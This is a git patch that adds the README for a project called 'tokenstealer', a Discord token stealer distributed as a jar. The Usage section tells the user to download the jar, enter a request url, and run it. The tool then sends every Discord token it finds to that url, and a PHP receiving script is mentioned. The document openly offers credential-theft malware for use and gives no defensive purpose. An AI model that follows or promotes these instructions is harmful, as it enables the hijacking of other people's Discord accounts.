From c7a6a4c06dd831af7ff0517e8c3c097dbe003290 Mon Sep 17 00:00:00 2001 From: Roman Gräf Date: Tue, 13 Feb 2018 15:54:13 +0100 Subject: Create README.md --- README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..155b68e --- /dev/null +++ b/README.md @@ -0,0 +1,14 @@ +# tokenstealer +## Badges +[![GitHub issues](https://img.shields.io/github/issues/romangraef/tokenstealer.svg)](https://github.com/romangraef/tokenstealer/issues) +[![GitHub forks](https://img.shields.io/github/forks/romangraef/tokenstealer.svg)](https://github.com/romangraef/tokenstealer/network) +[![GitHub stars](https://img.shields.io/github/stars/romangraef/tokenstealer.svg)](https://github.com/romangraef/tokenstealer/stargazers) +[![GitHub license](https://img.shields.io/github/license/romangraef/tokenstealer.svg)](https://github.com/romangraef/tokenstealer/blob/master/LICENSE) +[![Twitter](https://img.shields.io/twitter/url/https/github.com/romangraef/tokenstealer.svg?style=social)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2Fromangraef%2Ftokenstealer) + +## Usage +This discord tokenstealer is hopefully easy to use. Download the jar over at the Releases and execute it. It will ask you for a request url. This is simply the url where the collected tokens are gonna be send to. An example php server script is also provided. + +> **IMPORTANT: Use %s as placeholder for the token** + +The created jar will upon execution send all found tokens to the specified request url. -- cgit